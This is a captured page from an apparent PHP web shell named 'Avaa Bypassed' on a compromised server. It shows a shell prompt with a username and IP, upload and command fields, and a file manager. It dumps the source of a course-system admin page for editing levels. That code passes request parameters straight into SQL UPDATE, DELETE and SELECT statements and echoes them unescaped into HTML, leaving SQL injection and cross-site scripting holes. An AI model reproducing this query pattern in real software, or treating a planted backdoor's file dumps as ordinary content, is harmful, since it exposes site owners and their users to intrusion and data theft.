[ Avaa Bypassed ]

Upload:

Command:

hmhc3928@18.118.0.93: ~ $ 
<?php
	$page_title = "Edit Level | CES Admin";
	include_once($_SERVER['DOCUMENT_ROOT'] . "/php/common_functions.php"); //common functions in the course registartion system
	include_once($_SERVER['DOCUMENT_ROOT'] . "/php/config.php"); //holds global config variables
 	check_if_authenticated('admin');//check if user is logged in
	include_once($_SERVER['DOCUMENT_ROOT'] . "/admin/php/top-admin.php"); //get the HTML heading common to all pages in the CES admin module
	
?>

 <article class="ces-admin">
        <h2>CES Admin - Edit Level</h2>


<?php
	include_once($_SERVER['DOCUMENT_ROOT'] . "/admin/php/nav-admin.php");
 	//opens connection to database

	$db = mysqli_connect($mysql_server, $user, $pass, $database);
	
	if(isset($_POST['submit'])){ //form has been submitted, update database with new values
	
		$level_description = htmlentities($_POST['level_description'], ENT_QUOTES);


		$sql = "UPDATE ces_levels
		SET level_description = \"$level_description\"
		WHERE level_id='$_POST[level_id]'";
		   
		if (mysqli_query($db, $sql)) //updates the database
			echo "<div class=courseMainHeading>Level updated successfully.</div>";
		else
			print_sql_error('Error - could not update the level when trying to do:', $sql);
	}
	if(isset($_POST['cancel'])){ //form has been canceled
		//do nothing
	}//if

	if(isset($_POST['delete'])){
		$delete_level_sql = "DELETE FROM ces_levels WHERE level_id = '$_POST[level_id]'";
		if (mysqli_query($db, $delete_level_sql)) {
			if (isset($_POST['level_id']) && $_POST['level_id'] > ''){
				echo "<p class='alert alert-block alert-success'>Level # <em>".$_POST['level_id']."</em> was deleted successfully</p>\n";
			}
			else{
				echo "<p class='alert alert-block alert-success'>The Level was deleted successfully</p>\n";
			}			
		}
	}
	
	if(isset($_GET['level_id'])){ //we can identify the record, instructor_id is the primary key in the database, print out the record and allow updates
	
		$sql = mysqli_query($db, "SELECT level_id, level_description FROM ces_levels WHERE level_id = '$_GET[level_id]'");
	
		while ($query = mysqli_fetch_array($sql)) { ?>

		<form method="post" action="<?php echo $_SERVER['PHP_SELF'] ?>">
			<input type='hidden' name='level_id' value="<?php echo $_GET['level_id']?>">
			<div class="form-group">
				<label for="level_id">Level ID:</label>
				<input class="form-control" style="width:70px;" type='text' id='level_id' name='level_id' value="<?php echo $query["level_id"]?>" disabled>
			</div>
			<div class="form-group">
				<label for="level_description">Level Description:</label>
				<textarea class="form-control" rows='4' style="height:auto; resize:none;" name='level_description' wrap='soft' required autofocus placeholder="Level Description"><?php echo $query["level_description"]?></textarea>
			</div>
			
			<input type='submit' name='submit' value="Update Level" class="btn btn-lg btn-block ces-green-btn">

			<input type='submit' name='cancel' value="Cancel" class="btn btn-lg btn-block ces-orange-btn">

			<?php
			$level_id_count_sql = mysqli_query($db, "SELECT level_id FROM ces_courses WHERE level_id = '$query[level_id]'");
			$level_count = mysqli_num_rows($level_id_count_sql);
			if($level_count == 0){
				echo "\n<form  method='post' action='" . $_SERVER['PHP_SELF'] . "'>";
				echo '<input style="float:right;" class="btn btn-lg btn-block ces-grey-btn" type="submit" name="delete" value="Delete Unused Level" title="Delete Unused Level">';
				echo '<input type="hidden" name="level_id" value="'. $query["level_id"].'">';
				
			}

			?>
		</form>

		<?php

		} //while
		
	}//elseif
	
	else{ //output all the levels so we can pick which one to update	
		echo "\n<table class='table table-striped' border='0'>\n\t<thead><tr>";
		echo "\n\t<th>Level</th>";
		echo "\n\t<th>Description</th>";
		echo "\n\t<th># of Courses</th>";
		echo "\n\t<th></th>";
		echo "\n\t</tr></thead>";
		echo "\n\t<thead>";
	
		$level_sql = mysqli_query($db, "SELECT level_id, level_description FROM ces_levels ORDER BY level_id");
		$row_count = 0;
		while ($query = mysqli_fetch_array($level_sql)) {
			//output the record in a table format
			$row_count++;
			//echo "\n<tr>\n";
			echo "\n\t<tr class='" . output_row_stripe($row_count) . "'>\n";
			echo "\n\t<td>" . $query["level_id"] . "</td>";
			echo "\n\t<td>" . convert_line_returns($query["level_description"]) . "</td>";
			$level_id_count_sql = mysqli_query($db, "SELECT level_id FROM ces_courses WHERE level_id = '$query[level_id]'");
			$level_count = mysqli_num_rows($level_id_count_sql);
			echo "\n\t<td>" . $level_count . "</td>";
			echo "\n\t<td class='ces-list-icons'><a href=" . $_SERVER['PHP_SELF'] . "?level_id=" . $query["level_id"] . " class='orange-icon'><span title='Edit Level' class='fa fa-edit fa-lg'></span></a></td>";
			echo "\n\t</tr>";
		} //while
		echo "\n\t</thead>";
		echo "\n</table>";
	}//else
	
?>
 
  </article>
    


  </section><!-- #middle-->

</div><!-- #wrapper --> 
 
<?php require_once $_SERVER['DOCUMENT_ROOT'].'/require/footer.php';?>

Filemanager

DIR : / home/ hmhc3928/ public_html_community/ admin/ levels/
Name Type Size Permission Actions
add.php File 2.65 KB 0644
index.php File 4.91 KB 0644